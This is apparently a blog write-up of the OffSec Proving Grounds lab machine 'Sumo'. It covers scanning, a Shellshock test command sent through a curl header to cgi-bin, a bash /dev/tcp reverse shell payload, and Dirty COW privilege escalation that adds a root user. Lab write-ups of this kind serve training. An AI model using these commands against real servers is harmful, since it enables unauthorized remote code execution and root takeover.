OffSec PG - Sumo


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.2.22 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • cgi-bin/ (403)
  • icons/ (403)
  • doc/ (403)


The cgi-bin/ directory looked suspicious. Generally in the past, cgi-bins used to be executed by bash directly and were vulnerable to shellshock. There is however a 403 on the directory. Running it through gobuster again tells the existence of test under that directory. Navigating to it shows that it is the default cgi-bin for the server.

The test for vulnerability for shellshock can be done as follows → curl -H "My-Header: () { :; }; echo; /usr/bin/id" If this returns a valid result, then the server is vulnerable.

It was found that the server was in fact vulnerable. Therefore, used this as an RCE to get a reverse shell using the following payload → /bin/bash -i >& /dev/tcp/ 0>&1.

This gave a shell as the user www-data and subsequently the user flag.

Privilege Escalation

Looked at the kernel version which is 3.2.0-23-generic. This is very outdated. The OS version is Ubuntu 12.04. The machine is also 64 bit. Looking at results of searchsploit, dirty cow is an exploit that would fit the scenario.

There are 4 kinds of dirty cow, the one used for this machine is 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd method). Compiling the exploit and sending the binary via wget allows setting a new user with root permissions.

Then, logging in with the newly created user gives the root shell and subseqeuntly the root flag.

This post is licensed under CC BY 4.0 by the author.